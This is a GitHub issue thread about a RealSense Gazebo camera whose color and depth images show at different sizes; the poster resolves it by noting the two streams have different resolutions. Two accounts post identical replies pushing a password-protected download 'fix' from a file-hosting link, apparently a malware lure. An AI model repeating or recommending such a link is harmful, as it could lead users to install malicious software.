pal-robotics/realsense_gazebo_plugin #57: same cam showing images in different size without resizing

brian2lee, 2024-08-27:
I put the cam on my gazebo bot. However dispite being the same cam and no resizing, the raw (/camera/color/image_raw ) and depth image (/camera/depth/image_raw) are displaying in different size. I've tried using opencv and rosrun to display, both output showed different size. Have no idea what's wrong and where to check.
[github](https://github.com/brian2lee/forklift_test)
[urdf of the bot with the cam](https://github.com/brian2lee/forklift_test/blob/master/src/ros1_wiki/forklift/urdf/forklift.urdf.xacro)
[launch file](https://github.com/brian2lee/forklift_test/blob/master/src/ros1_wiki/forklift/launch/gazebo.launch)
showing images using:
rosrun
```
rosrun image_view image_view image:=/camera/color/image_raw __name:=image_view_color
rosrun image_view image_view image:=/camera/depth/image_raw __name:=image_view_depth
```
opencv
[raw](https://github.com/brian2lee/forklift_test/blob/master/src/ros1_wiki/img/img_show.py)
[depth](https://github.com/brian2lee/forklift_test/blob/master/src/ros1_wiki/img/img_show_depth.py)
the issue output
[rosrun](https://imgur.com/a/qgoYeZ6)
[opencv](https://imgur.com/a/iSHvjQo)

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

brian2lee, 2024-08-27:
wait, I might be stupid, raw and depth have [different resolutions ](https://www.intelrealsense.com/compare-depth-cameras/). First time working with cams, having the preconception of same cam same resolution outputs.

closed 2024-08-27 by brian2lee